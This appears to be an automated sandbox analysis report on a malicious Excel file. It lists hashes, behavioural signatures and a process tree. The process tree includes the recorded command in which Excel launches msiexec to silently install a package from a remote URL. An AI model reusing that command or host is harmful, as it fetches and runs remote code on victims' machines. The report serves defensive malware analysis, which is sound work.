Analysis
-
max time kernel
22s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
07-09-2024 21:19
Behavioral task
behavioral1
Sample
b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
Resource
win10v2004-20240802-en
General
-
Target
b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
-
Size
82KB
-
MD5
4343c63398743e8ac3d76e63f799f1b6
-
SHA1
7cd562a9c1be7d4f39ae824e1caeed9a6d03b81a
-
SHA256
b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2
-
SHA512
5af95beba0db5b5ea49fcaacb24013002afc51144a912fd8e250f522f8e371d278512e5740c7ca2ba3e7a16ef520b577bf01205a3435df378cfcbd9041f1348c
-
SSDEEP
1536:0Kpb8rGYrMPelwhKmFV5xtezEsgrdgrebDG7XE8rMxLgb4JSt1mGJfFacueBkgVq:0Kpb8rGYrMPelwhKmFV5xtezEsgrdgwR
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
msiexec.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2924 2280 msiexec.exe EXCEL.EXE -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2924 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEmsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2280 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 2924 msiexec.exe Token: SeIncreaseQuotaPrivilege 2924 msiexec.exe Token: SeRestorePrivilege 2768 msiexec.exe Token: SeTakeOwnershipPrivilege 2768 msiexec.exe Token: SeSecurityPrivilege 2768 msiexec.exe Token: SeCreateTokenPrivilege 2924 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2924 msiexec.exe Token: SeLockMemoryPrivilege 2924 msiexec.exe Token: SeIncreaseQuotaPrivilege 2924 msiexec.exe Token: SeMachineAccountPrivilege 2924 msiexec.exe Token: SeTcbPrivilege 2924 msiexec.exe Token: SeSecurityPrivilege 2924 msiexec.exe Token: SeTakeOwnershipPrivilege 2924 msiexec.exe Token: SeLoadDriverPrivilege 2924 msiexec.exe Token: SeSystemProfilePrivilege 2924 msiexec.exe Token: SeSystemtimePrivilege 2924 msiexec.exe Token: SeProfSingleProcessPrivilege 2924 msiexec.exe Token: SeIncBasePriorityPrivilege 2924 msiexec.exe Token: SeCreatePagefilePrivilege 2924 msiexec.exe Token: SeCreatePermanentPrivilege 2924 msiexec.exe Token: SeBackupPrivilege 2924 msiexec.exe Token: SeRestorePrivilege 2924 msiexec.exe Token: SeShutdownPrivilege 2924 msiexec.exe Token: SeDebugPrivilege 2924 msiexec.exe Token: SeAuditPrivilege 2924 msiexec.exe Token: SeSystemEnvironmentPrivilege 2924 msiexec.exe Token: SeChangeNotifyPrivilege 2924 msiexec.exe Token: SeRemoteShutdownPrivilege 2924 msiexec.exe Token: SeUndockPrivilege 2924 msiexec.exe Token: SeSyncAgentPrivilege 2924 msiexec.exe Token: SeEnableDelegationPrivilege 2924 msiexec.exe Token: SeManageVolumePrivilege 2924 msiexec.exe Token: SeImpersonatePrivilege 2924 msiexec.exe Token: SeCreateGlobalPrivilege 2924 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 2280 EXCEL.EXE 2280 EXCEL.EXE 2280 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe PID 2280 wrote to memory of 2924 2280 EXCEL.EXE msiexec.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe RESTART=1 /i http://zonaykan.com/lsadat2 /q ADRESS=TEMP2⤵
- Process spawned unexpected child process
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768